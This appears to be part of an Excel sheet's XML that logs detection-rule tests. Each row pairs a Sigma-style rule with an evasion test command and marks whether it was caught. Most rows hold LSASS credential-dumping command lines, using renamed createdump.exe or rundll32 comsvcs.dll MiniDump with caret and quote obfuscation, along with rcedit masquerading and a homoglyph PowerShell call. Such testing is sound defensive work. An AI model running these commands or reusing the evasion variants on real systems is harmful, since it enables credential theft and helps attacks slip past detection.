        <v>1</v>
      </c>
      <c r="I922" s="36" t="n"/>
      <c r="J922" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K922" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="923" ht="15.75" customHeight="1" s="42">
      <c r="A923" s="43" t="n"/>
      <c r="B923" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_break_process_tree</t>
        </is>
      </c>
      <c r="C923" s="36" t="inlineStr">
        <is>
          <t>Explorer Process Tree Break</t>
        </is>
      </c>
      <c r="D923" s="36" t="inlineStr">
        <is>
          <t>949f1ffb-6e85-4f00-ae1e-c3c5b190d605</t>
        </is>
      </c>
      <c r="E923" s="36" t="inlineStr">
        <is>
          <t>explorer.exe,/root,C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F923" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G923" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H923" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I923" s="36" t="n"/>
      <c r="J923" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K923" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="924" ht="15.75" customHeight="1" s="42">
      <c r="A924" s="43" t="n"/>
      <c r="B924" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C924" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D924" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E924" s="36" t="inlineStr">
        <is>
          <t>copy rcedit-x64.exe r.exe &amp;&amp; .\r.exe target.exe --set-version-string "Original""FileName" "svchost.exe"</t>
        </is>
      </c>
      <c r="F924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H924" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I924" s="43" t="n"/>
      <c r="J924" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K924" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="925" ht="15.75" customHeight="1" s="42">
      <c r="A925" s="43" t="n"/>
      <c r="B925" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C925" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D925" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E925" s="36" t="inlineStr">
        <is>
          <t>ren rcedit-x64.exe not_rcedit.exe &amp;&amp; .\not_rcedit.exe target.exe --set-version-string "OriginalFileName" "lsass.exe"</t>
        </is>
      </c>
      <c r="F925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H925" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I925" s="43" t="n"/>
      <c r="J925" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K925" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="926" ht="15.75" customHeight="1" s="42">
      <c r="A926" s="43" t="n"/>
      <c r="B926" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C926" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D926" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E926" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -u -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F926" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G926" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H926" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I926" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J926" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K926" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="927" ht="15.75" customHeight="1" s="42">
      <c r="A927" s="43" t="n"/>
      <c r="B927" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C927" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D927" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E927" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G927" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H927" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I927" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J927" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K927" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="928" ht="15.75" customHeight="1" s="42">
      <c r="A928" s="43" t="n"/>
      <c r="B928" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C928" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D928" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E928" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe -U -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F928" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G928" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H928" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I928" s="4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J928" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K928" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="929" ht="15.75" customHeight="1" s="42">
      <c r="A929" s="43" t="n"/>
      <c r="B929" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C929" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D929" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E929" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" /"f" C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H929" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I929" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J929" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K929" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="930" ht="15.75" customHeight="1" s="42">
      <c r="A930" s="43" t="n"/>
      <c r="B930" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C930" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D930" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E930" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -f C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F930" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G930" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H930" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I930" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J930" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K930" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="931" ht="15.75" customHeight="1" s="42">
      <c r="A931" s="43" t="n"/>
      <c r="B931" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C931" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D931" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E931" s="36" t="inlineStr">
        <is>
          <t>copy createdump.exe C:\temp\createdump.exe &amp;&amp; C:\temp\createdump.exe /"u" -F C:\temp\lsass.dmp 756</t>
        </is>
      </c>
      <c r="F931" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G931" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H931" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I931" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J931" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K931" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="932" ht="15.75" customHeight="1" s="42">
      <c r="A932" s="43" t="n"/>
      <c r="B932" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C932" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D932" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E932" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F932" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G932" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H932" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I932" s="43" t="n"/>
      <c r="J932" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K932" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="933" ht="15.75" customHeight="1" s="42">
      <c r="A933" s="43" t="n"/>
      <c r="B933" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C933" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D933" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E933" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I933" s="43" t="n"/>
      <c r="J933" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K933" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="934" ht="15.75" customHeight="1" s="42">
      <c r="A934" s="43" t="n"/>
      <c r="B934" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C934" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D934" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E934" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" --nAME /TMP/lsAss_dUmp.BIN 632</t>
        </is>
      </c>
      <c r="F934" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G934" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H934" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I934" s="43" t="n"/>
      <c r="J934" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K934" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="935" ht="15.75" customHeight="1" s="42">
      <c r="A935" s="43" t="n"/>
      <c r="B935" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C935" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D935" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E935" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FUlL --name /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I935" s="36" t="n"/>
      <c r="J935" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K935" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="936" ht="15.75" customHeight="1" s="42">
      <c r="A936" s="43" t="n"/>
      <c r="B936" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C936" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D936" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E936" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fULL /"-name" -"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I936" s="36" t="n"/>
      <c r="J936" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K936" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="937" ht="15.75" customHeight="1" s="42">
      <c r="A937" s="43" t="n"/>
      <c r="B937" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C937" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D937" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E937" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --FuLL /"-name" /tMP/lSaSS_DuMp.bin 632</t>
        </is>
      </c>
      <c r="F937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I937" s="36" t="n"/>
      <c r="J937" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K937" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="938" ht="15.75" customHeight="1" s="42">
      <c r="A938" s="43" t="n"/>
      <c r="B938" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C938" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D938" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E938" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --name /tMp/LSaSs_DUMp.bIn 632</t>
        </is>
      </c>
      <c r="F938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I938" s="36" t="n"/>
      <c r="J938" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K938" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="939" ht="15.75" customHeight="1" s="42">
      <c r="A939" s="43" t="n"/>
      <c r="B939" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C939" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D939" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E939" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --fulL --name /"tmp/lsass_dump.bin" 632</t>
        </is>
      </c>
      <c r="F939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I939" s="36" t="n"/>
      <c r="J939" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K939" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="940" ht="15.75" customHeight="1" s="42">
      <c r="A940" s="43" t="n"/>
      <c r="B940" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C940" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D940" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E940" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe /"-full" -"-name" /TmP/lSass_dUMp.BIN 632</t>
        </is>
      </c>
      <c r="F940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I940" s="36" t="n"/>
      <c r="J940" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K940" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="941" ht="15.75" customHeight="1" s="42">
      <c r="A941" s="43" t="n"/>
      <c r="B941" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C941" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D941" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E941" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe --full --NaMe /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I941" s="43" t="n"/>
      <c r="J941" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K941" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="942" ht="15.75" customHeight="1" s="42">
      <c r="A942" s="43" t="n"/>
      <c r="B942" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C942" s="36" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D942" s="36" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E942" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\createdump.exe C:\Temp\not_a_dump.exe &amp;&amp; C:\Temp\not_a_dump.exe -"-full" -"-name" /tmp/lsass_dump.bin 632</t>
        </is>
      </c>
      <c r="F942" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G942" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H942" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I942" s="36" t="n"/>
      <c r="J942" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K942" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="943" ht="15.75" customHeight="1" s="42">
      <c r="A943" s="43" t="n"/>
      <c r="B943" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C943" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D943" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E943" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F943" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G943" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H943" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I943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943" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K943" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="944" ht="15.75" customHeight="1" s="42">
      <c r="A944" s="43" t="n"/>
      <c r="B944" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C944" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D944" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E944" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" rundll32.exe C:\Windows\System32\com^svcs.dll,Mini^Dump 600 lsass.dmp f^ull</t>
        </is>
      </c>
      <c r="F944" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G944" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H944" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I944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944" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K944" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="945" ht="15.75" customHeight="1" s="42">
      <c r="A945" s="43" t="n"/>
      <c r="B945" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C945" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D945" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E945" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe comsvcs.dll,#131096 600 C:\temp\lsass.dmp full</t>
        </is>
      </c>
      <c r="F945" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G945" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H945" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I945" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J945" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K945" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="946" ht="15.75" customHeight="1" s="42">
      <c r="A946" s="43" t="n"/>
      <c r="B946" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C946" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D946" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E946" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp
enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F946" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G946" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H946" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I946" s="43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J946" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K946" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="947" ht="15.75" customHeight="1" s="42">
      <c r="A947" s="43" t="n"/>
      <c r="B947" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_process_dump_via_comsvcs</t>
        </is>
      </c>
      <c r="C947" s="36" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL</t>
        </is>
      </c>
      <c r="D947" s="36" t="inlineStr">
        <is>
          <t>646ea171-dded-4578-8a4d-65e9822892e3</t>
        </is>
      </c>
      <c r="E947" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp enamed_file.dll, MiniDump &lt;PID&gt; C:\Temp\dump.bin full</t>
        </is>
      </c>
      <c r="F947" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G947" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H947" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I947" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect (8e0bb260-d4b2-4fff-bb8d-3f82118e6892); Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J947" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K947" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="948" ht="15.75" customHeight="1" s="42">
      <c r="A948" s="43" t="n"/>
      <c r="B948" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_homoglyph_cyrillic_lookalikes</t>
        </is>
      </c>
      <c r="C948" s="36" t="inlineStr">
        <is>
          <t>Potential Homoglyph Attack Using Lookalike Characters</t>
        </is>
      </c>
      <c r="D948" s="36" t="inlineStr">
        <is>
          <t>32e280f1-8ad4-46ef-9e80-910657611fbc</t>
        </is>
      </c>
      <c r="E948" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" p�ｽ舜ershell.exe -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F948" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G948" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H948" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I948" s="36" t="n"/>
      <c r="J948" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K948" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="949" ht="15.75" customHeight="1" s="42">
      <c r="A949" s="43" t="n"/>
      <c r="B949" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C949" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D949" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
